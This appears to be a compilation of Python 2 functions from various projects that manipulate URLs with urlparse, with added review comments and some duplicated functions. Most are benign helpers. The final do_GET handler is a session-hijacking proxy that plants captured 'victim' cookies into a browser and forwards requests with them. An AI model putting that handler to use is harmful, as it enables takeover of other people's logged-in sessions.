def mangle_url(orig_url, url):
    """Rebuild *orig_url* (the catalog URL) so that it points at the
    scheme/host/port of *url* (the user-supplied endpoint), keeping the
    catalog's path, params, query and fragment.

    Errors are reported through utils.unknown(); presumably that helper
    aborts the check — TODO confirm against utils module.
    """
    try:
        endpoint_url = urlparse.urlparse(url)
    except Exception as e:
        utils.unknown("you must provide an endpoint_url in the form"
                      + "<scheme>://<url>/ (%s)\n" % e)
    scheme = endpoint_url.scheme
    # BUGFIX: urlparse() returns '' (never None) for a missing scheme, so the
    # original `scheme is None` test could not fire — and its message used the
    # name `e`, which is undefined outside the except clause (NameError).
    if not scheme:
        utils.unknown("you must provide an endpoint_url in the form"
                      + "<scheme>://<url>/\n")
    catalog_url = urlparse.urlparse(orig_url)
    # Endpoint port wins; fall back to the catalog's port, then the default.
    port = endpoint_url.port
    if port is None:
        if catalog_url.port is None:
            port = DAEMON_DEFAULT_PORT
        else:
            port = catalog_url.port
    netloc = "%s:%i" % (endpoint_url.hostname, port)
    # Scheme and netloc come from the endpoint; everything else from the catalog.
    url = urlparse.urlunparse([scheme, netloc,
                               catalog_url.path,
                               catalog_url.params,
                               catalog_url.query,
                               catalog_url.fragment])
    return url
def url_add_parameters(url, params):
    """Append *params* to *url*'s query string.

    Existing query keys are kept, so a key present in both the URL and
    *params* will appear more than once in the result.
    """
    if not params:
        return url
    pieces = list(urlparse.urlparse(url))
    # Index 4 of the 6-tuple is the query string.
    combined = parse_qsl(pieces[4]) + params.items()
    pieces[4] = urllib.urlencode(combined)
    return urlparse.urlunparse(pieces)
def add_url_params(url, params):
    """Return *url* with *params* merged into its query string.

    Keys already present in the URL are overwritten by *params*
    (last-write-wins via dict.update).
    """
    # BUGFIX: the original called `theurlparse(url)` directly while also using
    # `theurlparse.urlunparse(...)` — it cannot be both a function and a
    # module, so one of the two calls had to fail at runtime.  Since
    # `.urlunparse` is accessed, `theurlparse` is presumably the urlparse
    # module aliased at import time — TODO confirm against the file's imports.
    url_parts = list(theurlparse.urlparse(url))
    query = dict(parse_qsl(url_parts[4]))
    query.update(params)
    url_parts[4] = urlencode(query)
    return theurlparse.urlunparse(url_parts)
def make_job_desc_url(self, job_post_id):
    """Return self.url with a ``postid`` query parameter set to *job_post_id*.

    An existing ``postid`` parameter is replaced; all other query
    parameters are preserved.
    """
    pieces = list(urlparse.urlparse(self.url))
    args = dict(urlparse.parse_qsl(pieces[4]))
    args['postid'] = job_post_id
    pieces[4] = urlencode(args)
    return urlparse.urlunparse(pieces)
def get_url_path(self):
    """Return only the path-and-after portion of self.get_url().

    Scheme and netloc are stripped; path, params, query and fragment
    are kept.  Raises NotImplementedError when get_url is marked with
    the ``dont_recurse`` sentinel attribute (recursion guard).
    """
    if hasattr(self.get_url, "dont_recurse"):
        raise NotImplementedError
    try:
        full_url = self.get_url()
    except NotImplementedError:
        # Propagate unchanged so callers can distinguish "no URL".
        raise
    pieces = urlparse.urlparse(full_url)
    return urlparse.urlunparse(("", "") + pieces[2:])
def build_ics_urls(ics_url):
    """Build the http, webcal and Google-Calendar variants of *ics_url*.

    Returns a (http_url, webcal_url, google_url) tuple.  A non-https
    scheme is normalised to http; https is kept as-is.
    """
    google_calendar_url_base = 'http://www.google.com/calendar/render?cid='
    # Parse the URL into [scheme, netloc, path, params, query, fragment]
    pieces = list(urlparse.urlparse(ics_url))
    if pieces[0] != 'https':
        pieces[0] = 'http'
    ics_url_http = urlparse.urlunparse(pieces)
    # Same URL again, but with the webcal scheme.
    pieces[0] = 'webcal'
    ics_url_webcal = urlparse.urlunparse(pieces)
    # Embed the webcal URL as the `cid` parameter of the Google render URL.
    google_pieces = list(urlparse.urlparse(google_calendar_url_base))
    cid_query = dict(urlparse.parse_qsl(google_pieces[4]))
    cid_query['cid'] = ics_url_webcal
    google_pieces[4] = urllib.urlencode(cid_query)
    ics_url_google = urlparse.urlunparse(google_pieces)
    return ics_url_http, ics_url_webcal, ics_url_google
def change_get_args(url, func):
    """Rewrite *url*'s query string through *func*.

    func: a callback that receives the old query dictionary and returns
    the new query dictionary.
    """
    pieces = list(urlparse.urlparse(url))
    # parse_qs maps each key to a list of values; func sees/returns that shape.
    new_query = func(urlparse.parse_qs(pieces[4]))
    pieces[4] = urllib.urlencode(encode_query_dict(new_query), doseq=True)
    return urlparse.urlunparse(pieces)
def get_callback_url(self):
    """Return the OAuth callback URL.

    When both callback and verifier are set, the oauth_verifier is
    appended to the callback's query string; otherwise the callback is
    returned untouched (possibly None).
    """
    if not (self.callback and self.verifier):
        return self.callback
    # Append the oauth_verifier.
    scheme, netloc, path, params, query, fragment = urlparse.urlparse(self.callback)[:6]
    if query:
        query = '%s&oauth_verifier=%s' % (query, self.verifier)
    else:
        query = 'oauth_verifier=%s' % self.verifier
    return urlparse.urlunparse((scheme, netloc, path, params, query, fragment))
def add_url_params(url, new_params, concat=True, unique=True):
    """Merge *new_params* (dict or list of pairs) into *url*'s query string.

    concat=False discards the URL's existing query and uses only
    *new_params*; unique=True collapses duplicate keys (last one wins).
    """
    if isinstance(new_params, dict):
        new_params = [(k, v) for k, v in new_params.iteritems()]
    pieces = list(urlparse.urlparse(url))
    merged = (urlparse.parse_qsl(pieces[4]) + new_params) if concat else new_params
    if unique:
        # dict() keeps only the last value seen for each key.
        merged = dict(merged)
    pieces[4] = urllib.urlencode(merged)
    return urlparse.urlunparse(pieces)
def emit_curl(self):
    """Render this request as an equivalent ``curl`` command line.

    Includes -u credentials, a Content-Type header, the HTTP method,
    the URL (with self.params encoded into the query) and --data, each
    only when the corresponding attribute is set.
    """
    cmdp = {}
    auth = self.get_auth()
    cmdp['user_token'] = '-u "%s:%s"' % (auth.username, auth.password) if auth is not None else ''
    cmdp['content_type'] = '-H "Content-Type: %s"' % self.content_type if self.content_type is not None else ''
    cmdp['method'] = "-X %s" % self.method
    url_parts = list(urlparse.urlparse(self.get_url()))
    if self.params is not None:
        # Replace the query string with the encoded params.
        url_parts[4] = urlencode(self.params)
    cmdp['url'] = '"%s"' % urlparse.urlunparse(url_parts)
    cmdp['data'] = '--data "%s"' % urlencode(self.data) if self.data is not None else ''
    cmd = "curl {method} {content_type} {user_token} {url} {data}"
    return cmd.format(**cmdp).strip()
def _retry_using_form_auth(self, response, args):
    """Retry *response*'s request after a form-based login.

    POSTs username/password to /login on the same host; on success the
    returned session cookie is attached to a copy of the original
    request, which is then re-sent.  On a 401 the original (failed)
    response is returned unchanged.
    """
    adapter = requests.adapters.HTTPAdapter()
    original_request = _copy_request(response.request)
    parsed = urlparse.urlparse(response.url)
    # Same scheme/host, fixed /login path, no params/query/fragment.
    login_url = urlparse.urlunparse([parsed.scheme, parsed.netloc, '/login', None, None, None])
    credentials = {'username': self.username, 'password': self.password}
    login_request = requests.Request('POST', login_url, data=credentials).prepare()
    login_response = adapter.send(login_request, **args)
    if login_response.status_code == 401:
        self.log.error('Login failed: Invalid username or password?')
        return response
    cookie = login_response.headers.get('set-cookie')
    if cookie is not None:
        # Forward the freshly issued session cookie on the retried request.
        original_request.headers['Cookie'] = cookie
    return adapter.send(original_request, **args)
def render_GET(self, request):
    """Auth-gate landing page (Twisted resource).

    Logs the user in through authgate, records the username cookie and
    optional qticket session data, then either hands control back to a
    JS login popup or redirects to the originally requested location.

    NOTE(review): when login_required() raises a.redirect_exception the
    body below is skipped entirely — presumably authgate has already
    arranged the redirect itself; confirm against the authgate module.
    """
    # Explicit logout request: drop the informational "user" cookie.
    if request.args.get("logout"):
        self.deleteCookie(request, "user")
    a = authgate(request, config.AUTHGATEDOMAIN)
    try:
        # accepting=lambda x: True -> any authenticated user is accepted.
        ticket = a.login_required(accepting=lambda x: True)
    except a.redirect_exception as e:
        pass
    else:
        # only used for informational purposes, the backend stores this separately
        # so if the user changes it just their front end will be messed up!
        request.addCookie("user", ticket.username, path="/")
        qt = ticket.get("qticket")
        if qt is not None:
            getSessionData(request)["qticket"] = decodeQTicket(qt)
        self.__hit()
        if request.getCookie("jslogin"):
            # Popup-based login: return a page that hands the username back
            # to the opener window instead of redirecting.
            self.deleteCookie(request, "jslogin")
            return """<html><head><script>window.opener.__qwebircAuthCallback(%s);</script></head></html>""" % json.dumps(
                ticket.username)
        location = request.getCookie("redirect")
        if location is None:
            location = "/"
        else:
            self.deleteCookie(request, "redirect")
        # Strip scheme and netloc from the stored location so the redirect
        # can only land within this site (open-redirect guard).
        _, _, path, params, query, _ = urlparse.urlparse(
            urllib.unquote(location))
        location = urlparse.urlunparse(
            ("", "", path, params, query, ""))
        request.redirect(location)
        request.finish()
    # Twisted contract: response is (or will be) produced asynchronously.
    return server.NOT_DONE_YET
def mangle_url(self, url):
    """Point nova's management_url at the host/port of *url*.

    The scheme, hostname and (when given) port come from the
    user-supplied endpoint *url*; path, params, query and fragment are
    kept from the catalog URL already discovered by the client.  Errors
    are reported through utils.unknown(); presumably that helper aborts
    the check — TODO confirm.
    """
    # This first connection populates the structure we need inside
    # the object.  This does not cost anything if a connection has
    # already been made.
    self.check_connection()
    try:
        endpoint_url = urlparse.urlparse(url)
    except Exception as e:
        utils.unknown("you must provide an endpoint_url in the form"
                      + "<scheme>://<url>/ (%s)" % e)
    scheme = endpoint_url.scheme
    # BUGFIX: urlparse() returns '' (never None) for a missing scheme, so the
    # original `scheme is None` test could not fire — and its message used the
    # name `e`, which is undefined outside the except clause (NameError).
    if not scheme:
        utils.unknown("you must provide an endpoint_url in the form"
                      + "<scheme>://<url>/")
    catalog_url = None
    try:
        catalog_url = urlparse.urlparse(
            self.nova_client.client.management_url)
    except Exception as e:
        utils.unknown("unknown error parsing the catalog url : %s" % e)
    # Endpoint port wins; fall back to the catalog's port, then the default.
    port = endpoint_url.port
    if port is None:
        if catalog_url.port is None:
            port = self.DAEMON_DEFAULT_PORT
        else:
            port = catalog_url.port
    netloc = "%s:%i" % (endpoint_url.hostname, port)
    url = urlparse.urlunparse([scheme, netloc,
                               catalog_url.path,
                               catalog_url.params,
                               catalog_url.query,
                               catalog_url.fragment])
    self.nova_client.client.management_url = url
def make_relative(self, value):
    """Converts URL to relative, useful for server responses."""
    pieces = urlparse.urlparse(value)
    # Drop scheme and netloc; keep path, params, query and fragment.
    relative = ('', '', pieces.path, pieces.params, pieces.query, pieces.fragment)
    return urlparse.urlunparse(relative)
def add_parameters(self, url, params):
    """Return *url* with its query string replaced by the encoded *params*.

    Note: the existing query string is overwritten, not merged.
    """
    pieces = list(urlparse.urlparse(url))
    pieces[4] = urlencode(params)
    return urlparse.urlunparse(pieces)
def do_GET(self):
    """Cookie-planting HTTP proxy handler (Python 2 BaseHTTPRequestHandler).

    Two modes:
    * "set cookies" mode (host is the magic name ``setcookies``, or no
      cookies have been planted yet): walks the victim through every host
      in ``cookiejar`` via meta-refresh redirects, emitting Set-cookie
      headers for each host in turn.
    * plain proxy mode: forwards the request to the real host, injecting
      any cookie stored for it in ``cookiejar``.

    NOTE(review): this is Python 2 code — soc.send() with str, urllib.quote,
    cgi.escape, dict.keys() used as a list (.index on it) all predate py3.
    """
    global cookiejar
    global victimheaders
    global ate
    # 'http' is the default scheme when the request line has none.
    (scm, netloc, path, params, query, fragment) = urlparse.urlparse(
        self.path, 'http')
    if scm != 'http' or fragment or not netloc:
        self.send_error(400, "bad url %s" % html.escape(self.path))
        return
    soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # ip/port of the connecting client; currently unused.
        (ip, port) = self.client_address
        cookiehosts = cookiejar.keys()
        if (netloc == 'setcookies' or not ate.cookies):
            self.log.debug('time to set some cookies')
            if len(cookiehosts) > 0:
                # NOTE(review): message looks inverted — it fires when there
                # ARE cookies to set; confirm intent (debug-only impact).
                self.log.debug('no cookies to set')
                if netloc in cookiehosts:
                    # Plant this host's cookie: one Set-cookie header per
                    # ';'-separated piece of the stored cookie string.
                    newcookie = cookiejar[netloc]
                    headers = ''.join(map(lambda x: 'Set-cookie: %s;\r\n' % x,
                                          newcookie.split(';')))
                    nextpos = cookiehosts.index(netloc) + 1
                    print('setting cookie for %s' % netloc)
                    if nextpos >= len(cookiehosts):
                        # Last host reached: stop redirecting and list links.
                        body = "<h1> all cookies set</h1>"
                        ate.cookies = True
                        #cookiejar.clear()
                        body += ''.join(map(lambda x: "<a href='http://%s/'>%s</a>\r\n<br />" % (urllib.quote(x), cgi.escape(x)), cookiehosts))
                        body += "go to http://setcookies to set new cookies later on"
                    else:
                        # Meta-refresh to the next host in the jar.
                        nextdestination = cookiehosts[nextpos]
                        body = '<meta http-equiv="refresh" content="0;url=http://%s"/>' % urllib.quote(nextdestination)
                else:
                    # Host not in the jar: bounce to the first host to start.
                    headers = ''
                    body = '<meta http-equiv="refresh" content="0;url=http://%s"/>taking you somewhere' % urllib.quote(cookiehosts[0])
            else:
                headers = ''
                body = '<h1>no cookies to set</h1> go to http://setcookies to set cookies later on'
            # setcookiepkt is presumably a raw HTTP response template taking
            # (content-length, extra headers, body) — confirm its definition.
            self.log.debug(self.setcookiepkt % (len(body), headers, body))
            self.wfile.write(self.setcookiepkt % (len(body), headers, body))
        else:
            # Plain proxying: relay the request to the real server.
            if self._connect_to(netloc, soc):
                self.log_request()
                # Request line with a server-relative URL (scheme/netloc dropped).
                soc.send("%s %s %s\r\n" % (
                    self.command,
                    urlparse.urlunparse(('', '', path, params, query, '')),
                    self.request_version))
                #for header in victimheaders.keys():
                #self.headers[header] = victimheaders[header][0]
                self.headers['Connection'] = 'close'
                del self.headers['Proxy-Connection']
                # Inject the stored cookie for this host, if any.
                if netloc in cookiejar.keys():
                    self.headers['Cookie'] = cookiejar[netloc]
                for key_val in self.headers.items():
                    soc.send("%s: %s\r\n" % key_val)
                soc.send("\r\n")
                # Pump bytes between client and server until done.
                self._read_write(soc)
    finally:
        self.log.debug("\t bye")
        soc.close()
        self.connection.close()